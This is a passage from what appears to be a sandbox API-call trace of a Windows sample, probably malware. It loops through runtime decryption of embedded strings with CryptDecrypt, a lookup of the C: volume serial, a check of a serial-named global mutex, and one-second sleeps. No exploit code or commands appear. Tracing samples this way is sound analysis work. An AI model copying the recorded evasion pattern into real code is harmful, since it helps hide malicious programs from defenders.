returned 1 [0134.573] RtlAllocateHeap (HeapHandle=0x26a0000, Flags=0x8, Size=0x34) returned 0x26a1438 [0134.573] OpenMutexW (dwDesiredAccess=0x100000, bInheritHandle=0, lpName="Global\\0115B419773000") returned 0x224 [0134.573] WaitForSingleObject (hHandle=0x224, dwMilliseconds=0x0) returned 0x102 [0134.573] CloseHandle (hObject=0x224) returned 1 [0134.573] HeapFree (in: hHeap=0x26a0000, dwFlags=0x0, lpMem=0x26a12a8 | out: hHeap=0x26a0000) returned 1 [0134.573] HeapFree (in: hHeap=0x26a0000, dwFlags=0x0, lpMem=0x26a1438 | out: hHeap=0x26a0000) returned 1 [0134.573] RtlAllocateHeap (HeapHandle=0x26a0000, Flags=0x0, Size=0x20) returned 0x26a12a8 [0134.573] CryptImportKey (in: hProv=0xa968b8, pbData=0x266fbd8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x266fc40 | out: phKey=0x266fc40*=0xaa9610) returned 1 [0134.573] CryptSetKeyParam (hKey=0xaa9610, dwParam=0x1, pbData=0x266fc28, dwFlags=0x0) returned 1 [0134.573] CryptDecrypt (in: hKey=0xaa9610, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x26a12a8, pdwDataLen=0x266fbf4 | out: pbData=0x26a12a8, pdwDataLen=0x266fbf4) returned 1 [0134.573] CryptDestroyKey (hKey=0xaa9610) returned 1 [0134.573] RtlAllocateHeap (HeapHandle=0x26a0000, Flags=0x8, Size=0x1e) returned 0x26a12d0 [0134.573] RtlAllocateHeap (HeapHandle=0x26a0000, Flags=0x0, Size=0x1e) returned 0x26a1438 [0134.573] RtlAllocateHeap (HeapHandle=0x26a0000, Flags=0x0, Size=0x90) returned 0x26a1460 [0134.573] CryptImportKey (in: hProv=0xa968b8, pbData=0x266fbb0, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x266fc18 | out: phKey=0x266fc18*=0xaa9010) returned 1 [0134.574] CryptSetKeyParam (hKey=0xaa9010, dwParam=0x1, pbData=0x266fc00, dwFlags=0x0) returned 1 [0134.574] CryptDecrypt (in: hKey=0xaa9010, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x26a1460, pdwDataLen=0x266fbcc | out: pbData=0x26a1460, pdwDataLen=0x266fbcc) returned 1 [0134.574] CryptDestroyKey (hKey=0xaa9010) returned 1 [0134.574] HeapFree (in: hHeap=0x26a0000, dwFlags=0x0, lpMem=0x26a1460 | out: hHeap=0x26a0000) returned 1 [0134.574] ExpandEnvironmentStringsW (in: lpSrc="%systemdrive%\\", lpDst=0x26a12d0, nSize=0xf | out: lpDst="C:\\") returned 0x4 [0134.574] HeapFree (in: hHeap=0x26a0000, dwFlags=0x0, lpMem=0x26a1438 | out: hHeap=0x26a0000) returned 1 [0134.574] HeapFree (in: hHeap=0x26a0000, dwFlags=0x0, lpMem=0x26a12a8 | out: hHeap=0x26a0000) returned 1 [0134.574] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x3, lpVolumeSerialNumber=0x266fc80, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x266fc80*=0xb4197730, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0134.574] HeapFree (in: hHeap=0x26a0000, dwFlags=0x0, lpMem=0x26a12d0 | out: hHeap=0x26a0000) returned 1 [0134.574] RtlAllocateHeap (HeapHandle=0x26a0000, Flags=0x0, Size=0x40) returned 0x26a12a8 [0134.574] CryptImportKey (in: hProv=0xa968b8, pbData=0x266fc0c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x266fc74 | out: phKey=0x266fc74*=0xaa91d0) returned 1 [0134.574] CryptSetKeyParam (hKey=0xaa91d0, dwParam=0x1, pbData=0x266fc5c, dwFlags=0x0) returned 1 [0134.574] CryptDecrypt (in: hKey=0xaa91d0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x26a12a8, pdwDataLen=0x266fc28 | out: pbData=0x26a12a8, pdwDataLen=0x266fc28) returned 1 [0134.574] CryptDestroyKey (hKey=0xaa91d0) returned 1 [0134.574] RtlAllocateHeap (HeapHandle=0x26a0000, Flags=0x8, Size=0x34) returned 0x26a1438 [0134.574] OpenMutexW (dwDesiredAccess=0x100000, bInheritHandle=0, lpName="Global\\0115B419773000") returned 0x224 [0134.574] WaitForSingleObject (hHandle=0x224, dwMilliseconds=0x0) returned 0x102 [0134.574] CloseHandle (hObject=0x224) returned 1 [0134.574] HeapFree (in: hHeap=0x26a0000, dwFlags=0x0, lpMem=0x26a12a8 | out: hHeap=0x26a0000) returned 1 [0134.574] HeapFree (in: hHeap=0x26a0000, dwFlags=0x0, lpMem=0x26a1438 | out: hHeap=0x26a0000) returned 1 [0134.574] Sleep (dwMilliseconds=0x3e8) [0135.706] RtlAllocateHeap (HeapHandle=0x26a0000, Flags=0x0, Size=0x20) returned 0x26a14e8 [0135.706] CryptImportKey (in: hProv=0xa968b8, pbData=0x266fbd8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x266fc40 | out: phKey=0x266fc40*=0xaa93d0) returned 1 [0135.706] CryptSetKeyParam (hKey=0xaa93d0, dwParam=0x1, pbData=0x266fc28, dwFlags=0x0) returned 1 [0135.706] CryptDecrypt (in: hKey=0xaa93d0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x26a14e8, pdwDataLen=0x266fbf4 | out: pbData=0x26a14e8, pdwDataLen=0x266fbf4) returned 1 [0135.706] CryptDestroyKey (hKey=0xaa93d0) returned 1 [0135.706] RtlAllocateHeap (HeapHandle=0x26a0000, Flags=0x8, Size=0x1e) returned 0x26a1510 [0135.706] RtlAllocateHeap (HeapHandle=0x26a0000, Flags=0x0, Size=0x1e) returned 0x26a12a8 [0135.706] RtlAllocateHeap (HeapHandle=0x26a0000, Flags=0x0, Size=0x90) returned 0x26a43c8 [0135.706] CryptImportKey (in: hProv=0xa968b8, pbData=0x266fbb0, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x266fc18 | out: phKey=0x266fc18*=0xaa91d0) returned 1 [0135.706] CryptSetKeyParam (hKey=0xaa91d0, dwParam=0x1, pbData=0x266fc00, dwFlags=0x0) returned 1 [0135.706] CryptDecrypt (in: hKey=0xaa91d0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x26a43c8, pdwDataLen=0x266fbcc | out: pbData=0x26a43c8, pdwDataLen=0x266fbcc) returned 1 [0135.706] CryptDestroyKey (hKey=0xaa91d0) returned 1 [0135.706] HeapFree (in: hHeap=0x26a0000, dwFlags=0x0, lpMem=0x26a43c8 | out: hHeap=0x26a0000) returned 1 [0135.707] ExpandEnvironmentStringsW (in: lpSrc="%systemdrive%\\", lpDst=0x26a1510, nSize=0xf | out: lpDst="C:\\") returned 0x4 [0135.707] HeapFree (in: hHeap=0x26a0000, dwFlags=0x0, lpMem=0x26a12a8 | out: hHeap=0x26a0000) returned 1 [0135.707] HeapFree (in: hHeap=0x26a0000, dwFlags=0x0, lpMem=0x26a14e8 | out: hHeap=0x26a0000) returned 1 [0135.707] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x3, lpVolumeSerialNumber=0x266fc80, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x266fc80*=0xb4197730, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0135.707] HeapFree (in: hHeap=0x26a0000, dwFlags=0x0, lpMem=0x26a1510 | out: hHeap=0x26a0000) returned 1 [0135.707] RtlAllocateHeap (HeapHandle=0x26a0000, Flags=0x0, Size=0x40) returned 0x26a14e8 [0135.707] CryptImportKey (in: hProv=0xa968b8, pbData=0x266fc0c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x266fc74 | out: phKey=0x266fc74*=0xaa9010) returned 1 [0135.707] CryptSetKeyParam (hKey=0xaa9010, dwParam=0x1, pbData=0x266fc5c, dwFlags=0x0) returned 1 [0135.707] CryptDecrypt (in: hKey=0xaa9010, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x26a14e8, pdwDataLen=0x266fc28 | out: pbData=0x26a14e8, pdwDataLen=0x266fc28) returned 1 [0135.707] CryptDestroyKey (hKey=0xaa9010) returned 1 [0135.707] RtlAllocateHeap (HeapHandle=0x26a0000, Flags=0x8, Size=0x34) returned 0x26a12a8 [0135.707] OpenMutexW (dwDesiredAccess=0x100000, bInheritHandle=0, lpName="Global\\0115B419773000") returned 0x284 [0135.707] WaitForSingleObject (hHandle=0x284, dwMilliseconds=0x0) returned 0x102 [0135.707] CloseHandle (hObject=0x284) returned 1 [0135.708] HeapFree (in: hHeap=0x26a0000, dwFlags=0x0, lpMem=0x26a14e8 | out: hHeap=0x26a0000) returned 1 [0135.708] HeapFree (in: hHeap=0x26a0000, dwFlags=0x0, lpMem=0x26a12a8 | out: hHeap=0x26a0000) returned 1 [0135.708] Sleep (dwMilliseconds=0x3e8) [0136.719] RtlAllocateHeap (HeapHandle=0x26a0000, Flags=0x0, Size=0x20) returned 0x26a14e8 [0136.719] CryptImportKey (in: hProv=0xa968b8, pbData=0x266fbd8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x266fc40 | out: phKey=0x266fc40*=0xaa91d0) returned 1 [0136.719] CryptSetKeyParam (hKey=0xaa91d0, dwParam=0x1, pbData=0x266fc28, dwFlags=0x0) returned 1 [0136.719] CryptDecrypt (in: hKey=0xaa91d0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x26a14e8, pdwDataLen=0x266fbf4 | out: pbData=0x26a14e8, pdwDataLen=0x266fbf4) returned 1 [0136.719] CryptDestroyKey (hKey=0xaa91d0) returned 1 [0136.719] RtlAllocateHeap (HeapHandle=0x26a0000, Flags=0x8, Size=0x1e) returned 0x26a1510 [0136.719] RtlAllocateHeap (HeapHandle=0x26a0000, Flags=0x0, Size=0x1e) returned 0x26a12a8 [0136.719] RtlAllocateHeap (HeapHandle=0x26a0000, Flags=0x0, Size=0x90) returned 0x26a43c8 [0136.719] CryptImportKey (in: hProv=0xa968b8, pbData=0x266fbb0, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x266fc18 | out: phKey=0x266fc18*=0xaa93d0) returned 1 [0136.719] CryptSetKeyParam (hKey=0xaa93d0, dwParam=0x1, pbData=0x266fc00, dwFlags=0x0) returned 1 [0136.719] CryptDecrypt (in: hKey=0xaa93d0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x26a43c8, pdwDataLen=0x266fbcc | out: pbData=0x26a43c8, pdwDataLen=0x266fbcc) returned 1 [0136.719] CryptDestroyKey (hKey=0xaa93d0) returned 1 [0136.719] HeapFree (in: hHeap=0x26a0000, dwFlags=0x0, lpMem=0x26a43c8 | out: hHeap=0x26a0000) returned 1 [0136.719] ExpandEnvironmentStringsW (in: lpSrc="%systemdrive%\\", lpDst=0x26a1510, nSize=0xf | out: lpDst="C:\\") returned 0x4 [0136.719] HeapFree (in: hHeap=0x26a0000, dwFlags=0x0, lpMem=0x26a12a8 | out: hHeap=0x26a0000) returned 1 [0136.719] HeapFree (in: hHeap=0x26a0000, dwFlags=0x0, lpMem=0x26a14e8 | out: hHeap=0x26a0000) returned 1 [0136.719] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x3, lpVolumeSerialNumber=0x266fc80, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x266fc80*=0xb4197730, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0136.719] HeapFree (in: hHeap=0x26a0000, dwFlags=0x0, lpMem=0x26a1510 | out: hHeap=0x26a0000) returned 1 [0136.719] RtlAllocateHeap (HeapHandle=0x26a0000, Flags=0x0, Size=0x40) returned 0x26a14e8 [0136.719] CryptImportKey (in: hProv=0xa968b8, pbData=0x266fc0c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x266fc74 | out: phKey=0x266fc74*=0xaa94d0) returned 1 [0136.719] CryptSetKeyParam (hKey=0xaa94d0, dwParam=0x1, pbData=0x266fc5c, dwFlags=0x0) returned 1 [0136.719] CryptDecrypt (in: hKey=0xaa94d0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x26a14e8, pdwDataLen=0x266fc28 | out: pbData=0x26a14e8, pdwDataLen=0x266fc28) returned 1 [0136.719] CryptDestroyKey (hKey=0xaa94d0) returned 1 [0136.719] RtlAllocateHeap (HeapHandle=0x26a0000, Flags=0x8, Size=0x34) returned 0x26a12a8 [0136.719] OpenMutexW (dwDesiredAccess=0x100000, bInheritHandle=0, lpName="Global\\0115B419773000") returned 0x284 [0136.720] WaitForSingleObject (hHandle=0x284, dwMilliseconds=0x0) returned 0x102 [0136.720] CloseHandle (hObject=0x284) returned 1 [0136.720] HeapFree (in: hHeap=0x26a0000, dwFlags=0x0, lpMem=0x26a14e8 | out: hHeap=0x26a0000) returned 1 [0136.720] HeapFree (in: hHeap=0x26a0000, dwFlags=0x0, lpMem=0x26a12a8 | out: hHeap=0x26a0000) returned 1 [0136.720] Sleep (dwMilliseconds=0x3e8) [0137.904] RtlAllocateHeap (HeapHandle=0x26a0000, Flags=0x0, Size=0x20) returned 0x26a14e8 [0137.904] CryptImportKey (in: hProv=0xa968b8, pbData=0x266fbd8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x266fc40 | out: phKey=0x266fc40*=0xaa93d0) returned 1 [0137.904] CryptSetKeyParam (hKey=0xaa93d0, dwParam=0x1, pbData=0x266fc28, dwFlags=0x0) returned 1 [0137.917] CryptDecrypt (in: hKey=0xaa93d0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x26a14e8, pdwDataLen=0x266fbf4 | out: pbData=0x26a14e8, pdwDataLen=0x266fbf4) returned 1 [0137.917] CryptDestroyKey (hKey=0xaa93d0) returned 1 [0137.917] RtlAllocateHeap (HeapHandle=0x26a0000, Flags=0x8, Size=0x1e) returned 0x26a1510 [0137.917] RtlAllocateHeap (HeapHandle=0x26a0000, Flags=0x0, Size=0x1e) returned 0x26a12a8 [0137.917] RtlAllocateHeap (HeapHandle=0x26a0000, Flags=0x0, Size=0x90) returned 0x26a43c8 [0137.917] CryptImportKey (in: hProv=0xa968b8, pbData=0x266fbb0, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x266fc18 | out: phKey=0x266fc18*=0xaa94d0) returned 1 [0137.917] CryptSetKeyParam (hKey=0xaa94d0, dwParam=0x1, pbData=0x266fc00, dwFlags=0x0) returned 1 [0137.917] CryptDecrypt (in: hKey=0xaa94d0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x26a43c8, pdwDataLen=0x266fbcc | out: pbData=0x26a43c8, pdwDataLen=0x266fbcc) returned 1 [0137.917] CryptDestroyKey (hKey=0xaa94d0) returned 1 [0137.917] HeapFree (in: hHeap=0x26a0000, dwFlags=0x0, lpMem=0x26a43c8 | out: hHeap=0x26a0000) returned 1 [0137.917] ExpandEnvironmentStringsW (in: lpSrc="%systemdrive%\\", lpDst=0x26a1510, nSize=0xf | out: lpDst="C:\\") returned 0x4 [0137.917] HeapFree (in: hHeap=0x26a0000, dwFlags=0x0, lpMem=0x26a12a8 | out: hHeap=0x26a0000) returned 1 [0137.918] HeapFree (in: hHeap=0x26a0000, dwFlags=0x0, lpMem=0x26a14e8 | out: hHeap=0x26a0000) returned 1 [0137.918] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x3, lpVolumeSerialNumber=0x266fc80, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x266fc80*=0xb4197730, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0137.924] HeapFree (in: hHeap=0x26a0000, dwFlags=0x0, lpMem=0x26a1510 | out: hHeap=0x26a0000) returned 1 [0137.924] RtlAllocateHeap (HeapHandle=0x26a0000, Flags=0x0, Size=0x40) returned 0x26a14e8 [0137.924] CryptImportKey (in: hProv=0xa968b8, pbData=0x266fc0c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x266fc74 | out: phKey=0x266fc74*=0xaa92d0) returned 1 [0137.924] CryptSetKeyParam (hKey=0xaa92d0, dwParam=0x1, pbData=0x266fc5c, dwFlags=0x0) returned 1 [0137.924] CryptDecrypt (in: hKey=0xaa92d0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x26a14e8, pdwDataLen=0x266fc28 | out: pbData=0x26a14e8, pdwDataLen=0x266fc28) returned 1 [0137.924] CryptDestroyKey (hKey=0xaa92d0) returned 1 [0137.924] RtlAllocateHeap (HeapHandle=0x26a0000, Flags=0x8, Size=0x34) returned 0x26a12a8 [0137.924] OpenMutexW (dwDesiredAccess=0x100000, bInheritHandle=0, lpName="Global\\0115B419773000") returned 0x284 [0137.926] WaitForSingleObject (hHandle=0x284, dwMilliseconds=0x0) returned 0x102 [0137.926] CloseHandle (hObject=0x284) returned 1 [0137.926] HeapFree (in: hHeap=0x26a0000, dwFlags=0x0, lpMem=0x26a14e8 | out: hHeap=0x26a0000) returned 1 [0137.926] HeapFree (in: hHeap=0x26a0000, dwFlags=0x0, lpMem=0x26a12a8 | out: hHeap=0x26a0000) returned 1 [0137.927] Sleep (dwMilliseconds=0x3e8) [0139.046] RtlAllocateHeap (HeapHandle=0x26a0000, Flags=0x0, Size=0x20) returned 0x26a14e8 [0139.046] CryptImportKey (in: hProv=0xa968b8, pbData=0x266fbd8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x266fc40 | out: phKey=0x266fc40*=0xaa9010) returned 1 [0139.046] CryptSetKeyParam (hKey=0xaa9010, dwParam=0x1, pbData=0x266fc28, dwFlags=0x0) returned 1 [0139.046] CryptDecrypt (in: hKey=0xaa9010, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x26a14e8, pdwDataLen=0x266fbf4 | out: pbData=0x26a14e8, pdwDataLen=0x266fbf4) returned 1 [0139.046] CryptDestroyKey (hKey=0xaa9010) returned 1 [0139.046] RtlAllocateHeap (HeapHandle=0x26a0000, Flags=0x8, Size=0x1e) returned 0x26a1510 [0139.046] RtlAllocateHeap (HeapHandle=0x26a0000, Flags=0x0, Size=0x1e) returned 0x26a12a8 [0139.046] RtlAllocateHeap (HeapHandle=0x26a0000, Flags=0x0, Size=0x90) returned 0x26a43c8 [0139.046] CryptImportKey (in: hProv=0xa968b8, pbData=0x266fbb0, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x266fc18 | out: phKey=0x266fc18*=0xaa9010) returned 1 [0139.046] CryptSetKeyParam (hKey=0xaa9010, dwParam=0x1, pbData=0x266fc00, dwFlags=0x0) returned 1 [0139.047] CryptDecrypt (in: hKey=0xaa9010, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x26a43c8, pdwDataLen=0x266fbcc | out: pbData=0x26a43c8, pdwDataLen=0x266fbcc) returned 1 [0139.047] CryptDestroyKey (hKey=0xaa9010) returned 1 [0139.047] HeapFree (in: hHeap=0x26a0000, dwFlags=0x0, lpMem=0x26a43c8 | out: hHeap=0x26a0000) returned 1 [0139.047] ExpandEnvironmentStringsW (in: lpSrc="%systemdrive%\\", lpDst=0x26a1510, nSize=0xf | out: lpDst="C:\\") returned 0x4 [0139.047] HeapFree (in: hHeap=0x26a0000, dwFlags=0x0, lpMem=0x26a12a8 | out: hHeap=0x26a0000) returned 1 [0139.047] HeapFree (in: hHeap=0x26a0000, dwFlags=0x0, lpMem=0x26a14e8 | out: hHeap=0x26a0000) returned 1 [0139.047] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x3, lpVolumeSerialNumber=0x266fc80, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x266fc80*=0xb4197730, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0139.047] HeapFree (in: hHeap=0x26a0000, dwFlags=0x0, lpMem=0x26a1510 | out: hHeap=0x26a0000) returned 1 [0139.047] RtlAllocateHeap (HeapHandle=0x26a0000, Flags=0x0, Size=0x40) returned 0x26a14e8 [0139.047] CryptImportKey (in: hProv=0xa968b8, pbData=0x266fc0c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x266fc74 | out: phKey=0x266fc74*=0xaa93d0) returned 1 [0139.047] CryptSetKeyParam (hKey=0xaa93d0, dwParam=0x1, pbData=0x266fc5c, dwFlags=0x0) returned 1 [0139.047] CryptDecrypt (in: hKey=0xaa93d0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x26a14e8, pdwDataLen=0x266fc28 | out: pbData=0x26a14e8, pdwDataLen=0x266fc28) returned 1 [0139.047] CryptDestroyKey (hKey=0xaa93d0) returned 1 [0139.047] RtlAllocateHeap (HeapHandle=0x26a0000, Flags=0x8, Size=0x34) returned 0x26a12a8 [0139.048] OpenMutexW (dwDesiredAccess=0x100000, bInheritHandle=0, lpName="Global\\0115B419773000") returned 0x284 [0139.048] WaitForSingleObject (hHandle=0x284, dwMilliseconds=0x0) returned 0x102 [0139.048] CloseHandle (hObject=0x284) returned 1 [0139.048] HeapFree (in: hHeap=0x26a0000, dwFlags=0x0, lpMem=0x26a14e8 | out: hHeap=0x26a0000) returned 1 [0139.048] HeapFree (in: hHeap=0x26a0000, dwFlags=0x0, lpMem=0x26a12a8 | out: hHeap=0x26a0000) returned 1 [0139.048] Sleep (dwMilliseconds=0x3e8) [0140.252] RtlAllocateHeap (HeapHandle=0x26a0000, Flags=0x0, Size=0x20) returned 0x26a8a40 [0140.252] CryptImportKey (in: hProv=0xa968b8, pbData=0x266fbd8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x266fc40 | out: phKey=0x266fc40*=0xaa9450) returned 1 [0140.252] CryptSetKeyParam (hKey=0xaa9450, dwParam=0x1, pbData=0x266fc28, dwFlags=0x0) returned 1 [0140.252] CryptDecrypt (in: hKey=0xaa9450, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x26a8a40, pdwDataLen=0x266fbf4 | out: pbData=0x26a8a40, pdwDataLen=0x266fbf4) returned 1 [0140.252] CryptDestroyKey (hKey=0xaa9450) returned 1 [0140.252] RtlAllocateHeap (HeapHandle=0x26a0000, Flags=0x8, Size=0x1e) returned 0x26a8928 [0140.252] RtlAllocateHeap (HeapHandle=0x26a0000, Flags=0x0, Size=0x1e) returned 0x26a8a90 [0140.252] RtlAllocateHeap (HeapHandle=0x26a0000, Flags=0x0, Size=0x90) returned 0x26a9d40 [0140.252] CryptImportKey (in: hProv=0xa968b8, pbData=0x266fbb0, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x266fc18 | out: phKey=0x266fc18*=0xaa9450) returned 1 [0140.252] CryptSetKeyParam (hKey=0xaa9450, dwParam=0x1, pbData=0x266fc00, dwFlags=0x0) returned 1 [0140.252] CryptDecrypt (in: hKey=0xaa9450, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x26a9d40, pdwDataLen=0x266fbcc | out: pbData=0x26a9d40, pdwDataLen=0x266fbcc) returned 1 [0140.252] CryptDestroyKey (hKey=0xaa9450) returned 1 [0140.252] HeapFree (in: hHeap=0x26a0000, dwFlags=0x0, lpMem=0x26a9d40 | out: hHeap=0x26a0000) returned 1 [0140.252] ExpandEnvironmentStringsW (in: lpSrc="%systemdrive%\\", lpDst=0x26a8928, nSize=0xf | out: lpDst="C:\\") returned 0x4 [0140.252] HeapFree (in: hHeap=0x26a0000, dwFlags=0x0, lpMem=0x26a8a90 | out: hHeap=0x26a0000) returned 1 [0140.252] HeapFree (in: hHeap=0x26a0000, dwFlags=0x0, lpMem=0x26a8a40 | out: hHeap=0x26a0000) returned 1 [0140.252] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x3, lpVolumeSerialNumber=0x266fc80, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x266fc80*=0xb4197730, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0140.252] HeapFree (in: hHeap=0x26a0000, dwFlags=0x0, lpMem=0x26a8928 | out: hHeap=0x26a0000) returned 1 [0140.252] RtlAllocateHeap (HeapHandle=0x26a0000, Flags=0x0, Size=0x40) returned 0x26a9d40 [0140.252] CryptImportKey (in: hProv=0xa968b8, pbData=0x266fc0c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x266fc74 | out: phKey=0x266fc74*=0xaa9610) returned 1 [0140.252] CryptSetKeyParam (hKey=0xaa9610, dwParam=0x1, pbData=0x266fc5c, dwFlags=0x0) returned 1 [0140.253] CryptDecrypt (in: hKey=0xaa9610, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x26a9d40, pdwDataLen=0x266fc28 | out: pbData=0x26a9d40, pdwDataLen=0x266fc28) returned 1 [0140.253] CryptDestroyKey (hKey=0xaa9610) returned 1 [0140.253] RtlAllocateHeap (HeapHandle=0x26a0000, Flags=0x8, Size=0x34) returned 0x26a9d88 [0140.253] OpenMutexW (dwDesiredAccess=0x100000, bInheritHandle=0, lpName="Global\\0115B419773000") returned 0x2d4 [0140.253] WaitForSingleObject (hHandle=0x2d4, dwMilliseconds=0x0) returned 0x102 [0140.253] CloseHandle (hObject=0x2d4) returned 1 [0140.253] HeapFree (in: hHeap=0x26a0000, dwFlags=0x0, lpMem=0x26a9d40 | out: hHeap=0x26a0000) returned 1 [0140.253] HeapFree (in: hHeap=0x26a0000, dwFlags=0x0, lpMem=0x26a9d88 | out: hHeap=0x26a0000) returned 1 [0140.253] Sleep (dwMilliseconds=0x3e8) [0141.519] RtlAllocateHeap (HeapHandle=0x26a0000, Flags=0x0, Size=0x20) returned 0x26a8860 [0141.519] CryptImportKey (in: hProv=0xa968b8, pbData=0x266fbd8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x266fc40 | out: phKey=0x266fc40*=0xac3430) returned 1 [0141.519] CryptSetKeyParam (hKey=0xac3430, dwParam=0x1, pbData=0x266fc28, dwFlags=0x0) returned 1 [0141.519] CryptDecrypt (in: hKey=0xac3430, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x26a8860, pdwDataLen=0x266fbf4 | out: pbData=0x26a8860, pdwDataLen=0x266fbf4) returned 1 [0141.519] CryptDestroyKey (hKey=0xac3430) returned 1 [0141.519] RtlAllocateHeap (HeapHandle=0x26a0000, Flags=0x8, Size=0x1e) returned 0x26a87c0 [0141.519] RtlAllocateHeap (HeapHandle=0x26a0000, Flags=0x0, Size=0x1e) returned 0x26a8a18 [0141.519] RtlAllocateHeap (HeapHandle=0x26a0000, Flags=0x0, Size=0x90) returned 0x26a9d40 [0141.519] CryptImportKey (in: hProv=0xa968b8, pbData=0x266fbb0, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x266fc18 | out: phKey=0x266fc18*=0xac3030) returned 1 [0141.519] CryptSetKeyParam (hKey=0xac3030, dwParam=0x1, pbData=0x266fc00, dwFlags=0x0) returned 1 [0141.519] CryptDecrypt (in: hKey=0xac3030, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x26a9d40, pdwDataLen=0x266fbcc | out: pbData=0x26a9d40, pdwDataLen=0x266fbcc) returned 1 [0141.519] CryptDestroyKey (hKey=0xac3030) returned 1 [0141.519] HeapFree (in: hHeap=0x26a0000, dwFlags=0x0, lpMem=0x26a9d40 | out: hHeap=0x26a0000) returned 1 [0141.519] ExpandEnvironmentStringsW (in: lpSrc="%systemdrive%\\", lpDst=0x26a87c0, nSize=0xf | out: lpDst="C:\\") returned 0x4 [0141.519] HeapFree (in: hHeap=0x26a0000, dwFlags=0x0, lpMem=0x26a8a18 | out: hHeap=0x26a0000) returned 1 [0141.519] HeapFree (in: hHeap=0x26a0000, dwFlags=0x0, lpMem=0x26a8860 | out: hHeap=0x26a0000) returned 1 [0141.519] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x3, lpVolumeSerialNumber=0x266fc80, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x266fc80*=0xb4197730, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0141.519] HeapFree (in: hHeap=0x26a0000, dwFlags=0x0, lpMem=0x26a87c0 | out: 